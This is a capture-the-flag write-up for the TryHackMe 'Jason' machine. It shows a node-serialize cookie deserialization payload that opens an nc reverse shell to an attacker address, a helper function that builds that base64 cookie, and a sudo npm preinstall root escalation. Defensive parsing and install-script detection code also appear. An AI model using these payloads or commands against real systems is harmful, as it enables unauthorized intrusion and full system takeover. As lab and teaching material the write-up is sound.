TryHackMe: Jason

Today we will take a look at TryHackMe: Jason. My goal in sharing this writeup is to show you the way if you get stuck. Please try to understand each step and take notes.

Network scan

Command: sudo nmap -sS -sC -sV -oN nmap/initial 10.10.192.78

Let’s take a look at the website.

Let's enter something and look at the request in Burp.

And we see it is built with Node.js. I figured there would be a vulnerability related to JSON and Node.js, so I researched a bit and found out there is an RCE vulnerability.

I have prepared the following payload. The _$$ND_FUNC$$_ prefix is the function marker used by the node-serialize library's unserialize(), which eval()s such strings; the trailing () turns the function into an IIFE, so the command runs as soon as the cookie is deserialized. Replace $IP with your own address:

{"email":"test","rce":"_$$ND_FUNC$$_function(){ require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc $IP 4444 >/tmp/f', function(error, stdout, stderr) { console.log(stdout) }); }()"}

Since the payload has to travel in a cookie, I base64-encode it (base64 is an encoding, not encryption; it hides nothing from anyone reading the request).

Let's paste the encoded payload into the cookie and start a listener on port 4444 (nc -lvnp 4444).

When we refresh the page, the cookie is deserialized and we get a shell.
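As an added example (not code from the original writeup), the block below re-implements in a few lines the string-to-function step of node-serialize's unserialize(), which is the behaviour the _$$ND_FUNC$$_ cookie payload abuses, places a hardened session parser beside it, and builds the base64 cookie pasted into Burp. The ip and port arguments stand in for the writeup's $IP and 4444; the demo uses a harmless IIFE so nothing is spawned.

```javascript
// Added example, not code from the original writeup. It re-implements, in a
// few lines, the string-to-function step of node-serialize's unserialize()
// (the behaviour the `_$$ND_FUNC$$_` cookie payload abuses), shows a hardened
// parser beside it, and builds the base64 cookie the writeup pastes into Burp.
const FUNCFLAG = '_$$ND_FUNC$$_';

// VULNERABLE: mirrors node-serialize. Every string value that starts with the
// flag is passed to eval(). A trailing "()" in the payload turns the function
// into an IIFE, so the attacker's code runs during deserialization, before the
// application ever reads the value.
function vulnerableUnserialize(input) {
  const obj = typeof input === 'string' ? JSON.parse(input) : input;
  for (const key of Object.keys(obj)) {
    const val = obj[key];
    if (val !== null && typeof val === 'object') {
      obj[key] = vulnerableUnserialize(val);
    } else if (typeof val === 'string' && val.startsWith(FUNCFLAG)) {
      obj[key] = eval('(' + val.slice(FUNCFLAG.length) + ')');
    }
  }
  return obj;
}

// HARDENED: plain JSON.parse plus a whitelist of the fields the app expects.
// Strings stay strings, unknown keys (like "rce") are dropped, and nothing in
// the cookie can ever be turned back into a function.
function safeParseSession(b64Cookie) {
  const raw = JSON.parse(Buffer.from(b64Cookie, 'base64').toString('utf8'));
  if (raw === null || typeof raw !== 'object' || Array.isArray(raw)) {
    throw new Error('session cookie must be a JSON object');
  }
  if (typeof raw.email !== 'string') {
    throw new Error('email must be a string');
  }
  return { email: raw.email };
}

// Builds the writeup's cookie: JSON with the IIFE payload, then base64.
// `ip` and `port` are placeholders for the writeup's $IP and 4444.
function buildReverseShellCookie(ip, port) {
  const cmd = `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ${ip} ${port} >/tmp/f`;
  const rce = FUNCFLAG +
    `function(){ require('child_process').exec('${cmd}', ` +
    'function(error, stdout, stderr) { console.log(stdout) }); }()';
  return Buffer.from(JSON.stringify({ email: 'test', rce })).toString('base64');
}

// Runs both parsers over a harmless payload (the IIFE just returns a number)
// so the difference can be observed without spawning anything.
function demo() {
  const benign = JSON.stringify({ email: 'test', rce: FUNCFLAG + 'function(){ return 6*7 }()' });
  const cookie = Buffer.from(benign).toString('base64');
  const decoded = Buffer.from(cookie, 'base64').toString('utf8');

  const pwned = vulnerableUnserialize(decoded); // rce has already executed: 42
  const safe = safeParseSession(cookie);        // rce is discarded, email kept
  return { executedResult: pwned.rce, safeEmail: safe.email, safeHasRce: 'rce' in safe };
}

console.log(demo());
```

The point of the vulnerable path is that the function body has already run by the time unserialize() returns; no application code needs to touch the rce field. The fix is not to filter the marker string but to never hand untrusted input to a deserializer that can rebuild functions: parse JSON, validate the shape, and ideally sign the cookie so a client cannot tamper with it at all.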

Privilege Escalation

Command: sudo -l

Let's exploit it. npm executes the lifecycle scripts declared in package.json during install, so a package whose preinstall script is /bin/bash gives us a root shell when npm runs under sudo; --unsafe-perm stops npm from dropping to an unprivileged user for that script.

Command: TF=$(mktemp -d)

Command: echo '{"scripts": {"preinstall": "/bin/bash"}}' > $TF/package.json

Command: sudo /usr/bin/npm -C $TF --unsafe-perm i

And now we are root.
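As an added example (not code from the original writeup), the check below lists the lifecycle hooks npm runs automatically on npm install and flags the ones that hand control straight to a shell, the pattern the package.json above uses. The same hook is how a malicious dependency executes code on a developer's machine, so this is the check a practitioner wants before installing anything. The package.json samples are constructed for the example; the shell-detection regex is a heuristic, not a complete list.

```javascript
// Added example, not code from the original writeup. npm runs the lifecycle
// hooks below automatically during `npm install`, which is why a package.json
// with a "preinstall" script is a root shell when npm runs under sudo. The same
// hook is how a malicious dependency executes code on a developer's machine, so
// this check lists and flags install-time scripts before anything is installed.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Returns every hook npm would run on `npm install`, with its command.
function installTimeScripts(packageJsonText) {
  const pkg = JSON.parse(packageJsonText);
  const scripts = pkg && typeof pkg.scripts === 'object' && pkg.scripts ? pkg.scripts : {};
  return INSTALL_HOOKS
    .filter((hook) => typeof scripts[hook] === 'string' && scripts[hook].trim() !== '')
    .map((hook) => ({ hook, command: scripts[hook] }));
}

// Heuristic for scripts that hand control straight to a shell or interpreter:
// a bare sh/bash invocation (the writeup's "/bin/bash"), `node -e`, or a
// curl-pipe-to-shell. Build steps such as `node-gyp rebuild` are not flagged.
const SHELL_LIKE = /(^|[\s;&|])(\/bin\/)?(ba)?sh(\s|$)|\bnode\s+-e\b|\bcurl\b.*\|\s*(ba)?sh\b/;

function suspiciousInstallScripts(packageJsonText) {
  return installTimeScripts(packageJsonText).filter(({ command }) => SHELL_LIKE.test(command));
}

// Constructed samples: the writeup's privesc package.json, a benign package,
// and a native module with a legitimate (but still install-time) build step.
const PRIVESC_PACKAGE = JSON.stringify({ scripts: { preinstall: '/bin/bash' } });
const BENIGN_PACKAGE = JSON.stringify({ name: 'demo', scripts: { test: 'node test.js', build: 'tsc' } });
const NATIVE_PACKAGE = JSON.stringify({ name: 'native', scripts: { postinstall: 'node-gyp rebuild' } });

// Summarises what would run at install time and which of it looks like a shell.
function report(packageJsonText) {
  const all = installTimeScripts(packageJsonText);
  const bad = suspiciousInstallScripts(packageJsonText);
  return { installTime: all.length, suspicious: bad.map((s) => `${s.hook}: ${s.command}`) };
}

console.log(report(PRIVESC_PACKAGE)); // { installTime: 1, suspicious: [ 'preinstall: /bin/bash' ] }
```

On the defensive side, a sudo rule that lets a user run npm as root is equivalent to granting a root shell and should be removed rather than restricted. For day-to-day supply-chain hygiene, npm install --ignore-scripts (or npm config set ignore-scripts true) disables these hooks entirely; native modules that genuinely need a build step can then be rebuilt explicitly after review.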

"If you have any questions or comments, please do not hesitate to write. Have a good day."


Hello, my name is Elman. I am from Azerbaijan. I wish you a good day.
